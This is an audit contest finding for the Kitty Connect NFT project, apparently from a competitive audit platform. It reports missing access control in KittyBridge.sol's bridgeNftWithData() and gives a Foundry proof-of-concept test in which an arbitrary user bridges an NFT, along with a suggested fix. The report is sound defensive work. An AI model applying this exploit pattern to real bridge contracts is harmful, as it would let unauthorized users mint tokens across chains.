First Flight #12: Kitty Connect
First Flight #12: Kitty Connect
Beginner FriendlyFoundryNFTGameFi
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Missing access control

robertodf99

Summary

Missing access control in the bridge contract.

Vulnerability Details

The KittyBridge.sol::bridgeNftWithData() function lacks proper access control, allowing unauthorized users to call it.

Impact

Arbitrary users can call this function and transfer tokens bypassing the intended functionality of KittyConnect.sol::bridgeNftToAnotherChain() as long as the sender address and source chain are in the destination allow list. This will allow minting new NFTs in other chains just paying the fees associated to the bridging process.

Proof of Code

Add the following to the current test suite:

Code
function test_maliciousUserCanBridgeNFT() public {
uint64 otherChainSelector = 14767482510784806043;
address destChainBridge = makeAddr("destChainBridge");
address randomUser = makeAddr("randomUser");
string
memory catImageIpfsHash = "ipfs://QmbxwGgBGrNdXPm84kqYskmcMT3jrzBN8LzQjixvkz4c62";
bytes memory data = abi.encode(
randomUser,
"Hehe",
"Hehe",
catImageIpfsHash,
block.timestamp,
partnerA
);
vm.startBroadcast(randomUser);
kittyBridge.bridgeNftWithData(
otherChainSelector,
destChainBridge,
data
);
vm.stopBroadcast();
}

Then run the command: forge test --mt test_maliciousUserCanBridgeNFT --fork-url $(grep -w SEPOLIA_RPC_URL .env | cut -d '=' -f2)

Tools Used

Manual review.

Recommendations

Implement access control at the beginning of the function. For example:

if (msg.sender != kittyConnect) {
revert KittyBridge__NotKittyConnect();
}

Note: The error KittyBridgeBase.sol::KittyBridge__NotKittyConnect() is declared but not utilized.

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

`bridgeNftWithData` misses access control

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.